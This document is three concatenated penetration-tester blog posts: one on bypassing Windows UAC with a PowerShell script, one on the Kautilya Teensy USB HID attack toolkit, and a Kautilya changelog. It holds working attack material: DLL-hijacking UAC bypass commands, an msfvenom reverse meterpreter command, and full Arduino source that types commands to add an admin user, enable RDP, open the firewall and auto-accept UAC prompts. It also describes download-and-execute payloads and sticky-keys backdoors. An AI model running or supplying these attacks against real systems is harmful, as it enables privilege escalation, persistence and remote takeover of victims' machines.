Bypassing UAC with PowerShell

Recently during a Red Team engagement, I got shell access to some user machines using Client Side Attacks. In many cases, the users had administrative privileges but I was stuck into non-elevated PowerShell reverse shells.  UAC (User Account Control) was the spoilsport here. I hate UAC, it is annoying yet it "is not a security boundary". I read and tried stuff for bypassing UAC and learned that it is trivial to bypass it. In this post, we will go through various methods and code required to bypass UAC.

The tool of choice for bypassing UAC is UACME https://github.com/hfiref0x/UACME. This awesome tool  implements various methods and is thankfully open source. Thanks to @hFirF0XAs.

As I always try to keep the post-exploitation phase within PowerShell, I tested UACME and implemented some of the methods using PowerShell . I give you Invoke-PsUACme.ps1. It could be found in the Escalation category of Nishang. 

Lets begin with the sysprep method which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009 (details here), it involves the following steps:

1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version.
CRYPTBASE.dll for Windows 7
shcore.dll for Windows 8

2.  Execute sysprep.exe from the above directory. It will load the the above DLL and execute it with elevated privileges. 

In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:

Method Name	Write DLL to	DLL Name	Executable to Use
sysprep	C:\Windows\System32\sysprep\	CRYPTBASE.dll for Windows 7 and shcore.dll for Windows 8	C:\Windows\System32\sysprep\sysprep.exe
oobe	C:\Windows\System32\oobe\	wdscore.dll for Windows 7, 8 and 10	C:\Windows\System32\oobe\setupsqm.exe
actionqueue	C:\Windows\System32\sysprep\	ActionQueue.dll only for Windows 7	C:\Windows\System32\sysprep\sysprep.exe
migwiz	C:\Windows\System32\migwiz\	wdscore.dll for both Windows 7 and 8	C:\Windows\System32\migwiz\migwiz.exe
cliconfg	C:\Windows\System32\	ntwdblib.dll for Windows 7, 8 and 10	C:\Windows\System32\cliconfg.exe
winsat	C:\Windows\System32\sysprep\Copy winsat.exe from C:\ Windows\System32\ to C:\Windows\System32\sysprep\	ntwdblib.dll for Windows 7 and devobj.dll for Windows 8 and 10	C:\Windows\System32\sysprep\winsat.exe
mmc	C:\Windows\System32\	ntwdblib.dll for Windows 7 and elsext.dll for Windows 8 and 10.	C:\Windows\System32\mmc.exe eventvwr

Builds Tested:

Windows 7 build 6.1.7601.65536
Windows 8.1 build 6.3.9600.0 
Windows 10 build 10.0.10240.0

Now, to copy the DLL to the the sysprep directory, we need elevated privileges. The two most popular ways of achieving this elevation are: use an IFileOperation COM object or use Wusa.exe with its "extract" option.

Currently, Invoke-PsUACme uses the Wusa method. Since Wusa  is set to auto-elevate, we can use it to extract a cab file to the sysprep directory. A cab file could be created using the makecab utility.

C:\> makecab C:\uac\evil.dll C:\uac\uac.cab
C:\> wusa C:\uac\uac.cab /extract:C:\Windows\System32\sysprep\

Above commands are there just for explaining what Invoke-PsUACme does. We need not run the commands manually.

Now, the DLL which Invoke-PsUACme uses is Fubuki from the UACME project with a minor change. Instead of executing cmd.exe, we tell the DLL to execute cmd.bat from C:\Windows\Temp. It is this cmd.bat which will contain our payload to be executed on the target. This provides us a lot of flexibility while executing complex attacks.

Above DLLs (for 64 bit and 32 bit) are hard coded in the script in DLLBytes64 and DLLBytes32 variables. The script is able to determine the bit-ness of the process from which it is called and uses the apt DLL.

Coming to the more interesting part, Invoke-PsUACme could be used this way:

PS C:\> . C:\nishang\Escalation\Invoke-PsUACme.ps1
PS C:\> Invoke-PsUACme -method sysprep

Nice, we are able to bypass UAC! The default payload just checks if the bypass was successful. Note that the -noexit parameter is passed to PowerShell in cmd.bat so that we can see the output.

Custom Payload

We can always use custom payloads as well:

PS C:\> Invoke-PsUACme -method oobe -Payload "powershell -noexit -c Get-Process" 

Note that we need to specify the powershell.exe as well. Whatever is specified for the Payload parameter ends up in C:\Windows\Temp\cmd.bat. You can always change the path to the batch file using the PayloadPath parameter after changing it in the DLL.

We will come back to more practical use of the Payload parameter in a minute.

Custom DLL

To use a Custom DLL, we can use the CustomDLL64 and CustomDLL32 parameters. For example, lets use the original 64 bit Fubuki DLL from UACME and use it with Invoke-PsUACme

PS C:\> Invoke-PSUACMe -CustomDll64 C:\test\Fubuki64.dll -CustomDll32 C:\test\Fubuki32.dll -Verbose" 

We can also prvide a byte array of DLLs to the DLLBytes64 and DLLBytes32 parameter.

Ok, fine. How is it useful?

Lets recreate the scenario with which I started the post, we have few reverse PowerShell shells with no elevated rights. We can use Invoke-PsUACme to execute commands and scripts with elevated rights. Lets use reverse TCP one liner from Nishang, encode it using Invoke-Encode and use it with Invoke-PsUACme:

Awesome! We successfully bypassed UAC and elevated our privileges. To verify it, we ran Get-PassHashes from Powerpreter.

Once elevated privileges are there, we can always elevate to SYSTEM using Enable-DuplicateToken from Nishang/Powerpreter.

Bingo!

In fact, after SYSTEM privs we can use Invoke-Mimikatz from Powersploit for using domain tokens as well. Get your Golden/Silver tickets right here! In case you cannot pull scripts from a web server as in above example, use Invoke-Encode to encode them as compressed base64 and use with the EncodedCommand (-e or -encodecommand) parameter of powershell.exe. You may like to use '-WindowStyle hidden' paramter of PowerShell to avoid showing any pop ups to the user.

There are limitless opportunities with this. Although, metasploit has its own implementation of UAC bypass, we can get a meterpreter with elevated privileges. We can generate a meterpreter in PowerShell using msfvenom: ./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.230.154 -f psh-reflection

I can never stop stressing how useful PowerShell is for pen testing Windows network. For example, we can use Invoke-PsUACme as a payload with the Client Side attacks initially as well. Lets use Invoke-PsUACme with Out-Word from Nishang. Lets make the function call from the Invoke-PsUACme script itself to avoid unnecessary complex command.

Sweet! An elevated interactive reverse PowerShell shell.

As you can see implementing existing techniques in PowerShell is very rewarding. It not only increases the understanding of PowerShell but the technique as well.

Limitations

Since, Invoke-PsUACme is based on the UACME project which itself implementd techniques used by malware, there are chances that DLLs dropped by it are detected by AV in future. Going by the past record, minor changes in the DLL source should solve this problem, whenever it arises.

Wusa.exe on Windows 10  has no "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently. Please feel free to implement IFileOperation or any other method. I welcome pull requests.

There are other implementations as well of UAC bypass in PowerShell. See this http://www.powershellempire.com/?page_id=380

To better know about the UAC bypass, follow the below links:
https://www.greyhathacker.net/?p=796
http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html

Hope you enjoyed the post!

Shameless self promotion

If you liked the post and want to learn more and/or want to support my research and work, join me for a two days training "PowerShell for Penetration Testers" at:

DeepSec, Vienna (November 17-18th, 2015) - https://deepsec.net/speaker.html#WSLOT192

Teensy USB HID for Penetration Testers - Part 4 - Kautilya

In third part of this series, we discussed how to write sketches using Arduino and Teensyduino. In this part, let's have a look at Kautilya. Kautilya is a toolkit written by me which helps in easing usage of Teensy in a penetration test. It is named after the famous Indian strategist, economist and political scientist Chankaya (Kautilya is one of his alias).  I will touch some less complex payload of Kautilya in this post.

Kautilya has a menu driven UI which could be used to generate sketches without a need of knowing how to program a Teensy device. The toolkit is written in Ruby and is free and open source. It currently contains payloads for Windows 7 and Linux (tested on Ubuntu 11). Kautilya is specifically designed to support Teensy out of the box, there is absolutely no modification required to the hardware.My motive behind writing Kautilya is to bring Teensy to masses. During my talks about Kautilya and Teensy I observed that often Pen Testers do not have enough time to program a device for their usage. Payloads in Kautilya could be used for pre exploitation and post exploitation tasks other than the “usual” popping of shells. 

The process of writing payloads for a Windows 7 machine could be summed up as:

1. Understand the operating system in terms of USB buffer.
2. Understand the commands supported and learn to write powershell or/and vbs.
3. Recognize the built-in security measures (like UAC and powershell script execution policy) which may check privileged commands and then learn how to bypass them.
4. Understand the time taken by operating system in completing various commands.
5. Write the commands and scripts on Teensy.
6. Understand more quirks of the command line when Teensy types out thing on victim.
7. Try not to be too noisy on the victim.
8. Test the payload and reach to final reasonable sketch.
9. Compile the sketch to Teensy device.
10. Attach it to the victim machine actively or using Social Engineering.
11. Enjoy the pwnage!

(Next few lines may look like self promotion ;) )

Kautilya automates steps 1-8 for you. Using Kautilya you just need to:

1. Select a payload and select your options. A sketch (a .ino or .pde file) would be generated for you.
2. Compile the sketch to Teensy device.
3. Attach it to the victim machine actively or using Social Engineering.
4. Enjoy the pwnage!

A screenshot of Kautilya 0.2.2

Kautilya is tested on Ruby 1.9.2. It requires ruby gems "colored" and "highline".

Let's have a look at some of the payloads for Windows in Kautilya. All the payloads are tested on a default install of Windows 7.

Add a user and Enable RDP
This payload adds an admin user to the victim. It also, enables and starts Terminal Service on the victim. An exception to Windows firewall is also added. This payload requires a user to be logged in with admin privileges.

The generated payload just needs to be compiled to a Teensy++. The device could then be connected to the victim. The victim will see start menu open up, some cmd being type and then a very small cmd window which type dark blue on black will do evil stuff for us...muhahaha

Let's have a look at the source code for better understanding. Many payloads in Kautilya are similar in structure to this one.

// Add an admin user and enable RDP payload of Kautilya
# define PAYLOAD_USER_ADD "net user INPUT0 INPUT1 /add"
//INPUT0 would be the username and INPUT1 would be the password.
# define PAYLOAD_GROUP_ADD "net localgroup Administrators INPUT0 /add"

void setup(){
 delay(5000);
 cmd_admin();
\\call to cmd_admin function
 delay(5000);
 send_alt_y();
\\\\call to send_alt_y function
 delay(5000);

add_user();
\\call to add_user function

Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
\\Enable terminal service
delay(2000);
Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TermService\" /v Start /t REG_DWORD /d 2 /f");
delay(2000);
Keyboard.println("sc start termservice");
\\start terminal service
delay(2000);
Keyboard.println("netsh firewall set service type = remotedesktop mode = enable");
\\Add execption to Windows Firewall
delay(3000);
Keyboard.println("exit");
}

void loop(){
}

void run(char *SomeCommand){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();

  delay(1500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  Keyboard.set_key1(0);
  Keyboard.send_now();
}
void add_user(){
delay(2000);
Keyboard.println(PAYLOAD_USER_ADD);
delay(2000);
Keyboard.println(PAYLOAD_GROUP_ADD);
delay(1000);

}


void send_alt_y(){
\\This function sends an Alt + Y to UAC prompt
\\thus effectively saying yes to the prompt  
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);

  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  }
void cmd_admin(){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.send_now();
  delay(1000);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(2000);
  Keyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\" ");
  \\this opens up a small cmd window which writes dark blue on black and have title Installing drivers
  delay(2000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  delay(200);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

Download and Execute

This payload downloads an executable stored in text format from pastebin (or any other service which allows hosting of text without formatting), converts it back to exe on the victim and executes it in background. The exe must be converted into hex format using script exetotext.ps1 in extras folder of Kautilya. This script is originally an idea of Matt of Exploit-Monday blog.

In the above example, a windows reverse meterpreter is pasted to pastebin and the url is provided in the option.This payload could be used even with a low privilege user.

Forceful Browsing
This payload opens up a hidden instance of Internet Explorer using a COM obbject of Internet Explorer and browses to the provided URL. An ideal use case could be hosting an exploit of msf  or a hook of BeEF  on the given URL. This payload is one of my favorites as it is able to get executed on a normal user (non administrative) privilege and is very silent.

Sethc and Utilman Backdoor
This payload utilizes a useful hack in the Windows OS family. On a locked system, if you press Shift key five times (or Left Ctrl + Left Shift + Prnt Scr) i.e. sticky keys, sethc.exe is executed with SYSTEM level privileges. In a similar way, if Window key +U is pressed, utilmanager (which is utilman.exe ) is launched with SYSTEM privs. This payload attaches a an executable present on the machine as a debugger to sethc.exe and utilman.exe. The attahced executables can then be executed with SYSTEM level privileges on a locked Windows machine.

 

We had a look at some less complex payloads of Kautilya. In the next post (or posts) I will explain some more complex and powerful payloads. At least one post will cover breaking Linux (Ubuntu11) too.

I am thinking of creating some small videos demonstrating few payloads but only if some people ask for it ;) Please let me know if the length of blog posts is ok. Feedback and comments are welcome.

Kautilya 0.3.0 Released - Breaking Mac OS X with USB HID and much more

Previous update of Kautilya was a couple of months back. I was travelling a lot and working on Nishang in spare time. Only a trickle of effort was given to Kautilya.  Anyway, I invested the past weekend working on Kautilya and the result is Kautilya 0.3.0. This is an important update and one of the largest since Kautilya was released. I was jumping in excitement while coding this, so much so, that I jumped some version numbers too :)

This version adds "support" for Mac OS X pwange (tested on Lion running on VMWare virtual machine) and many new payloads for Windows and Linux. Update your repositories and enjoy!!

Kautilya could be found here https://code.google.com/p/kautilya/

Below is the CHANGELOG for 0.3.0

- Added "Get Target Credentials" payload for Windows.
- Added "DNS TXT Code Execution" payload for Windows.
- Added "Tracking Target Connectivity" payload for Windows.
- Added "Speak" payload for Windows.
- Added "Wait for Command" payload for Windows.
- Added "DNS TXT Code Execution" for Linux.
- Added "Perl Reverse Shell (MSF)" for Linux.
- Added payloads for Mac OS X, tested on OS X Lion runnning on a VMWare.
- Added "Download and Execute" for  OS X.
- Added "DNS TXT Code Execution" for  OS X.
- Added "Perl Reverse Shell (MSF)" from OS X
- Added "Ruby Reverse Shell (MSF)" for OS X
- Fixed a minor bug in "code execution using powershell" payload.
- An exception is added to Windows firewall for bind shell in "Rogue AP" payload
- Fixed a major bug in "Connect to Hotspot and Execute code". The SSID key was being stored in encrypted format which doesn't work (Windows seem to encrypt WLAN keys using some machine specific key). Now the key is stored in plain and WLAN profile import works on other systems too.
- Fixed a bug in "Hashdump and upload to pastebin" payload. The powershell command was being called from the dumpaste.vbs script without bypassing executionpolicy. This means password hashes were being dumped but not pasted to pastebin..
- Removed TYPESPEED from every payload which was being used as good luck mark and was borrowed from SET :)
- Implemented Left + Enter as a method to say yes to UAC prompt, previously it was Alt + Y. Thanks to Paul who commented this on my blog.
- Increased the delay at the beginning to 25 seconds.
- Replaced the older "linux_codeexec.ino" (which had hardcoded shellcode) with proper file.
- Minor improvements in some lonux payload. Files written to disk are now written in /tmp.


 I would love feedback, bug reports and feature requests.